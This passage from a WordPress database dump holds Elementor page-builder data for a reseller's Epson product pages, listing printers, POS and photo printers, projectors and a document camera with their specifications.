swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T88V-i\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T70II\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7790,3456,'_elementor_version','2.5.14'),(7793,3457,'_wp_page_template','template-fullwidth.php'),(7794,3457,'_elementor_edit_mode','builder'),(7795,3457,'_elementor_template_type','post'),(7796,3457,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a 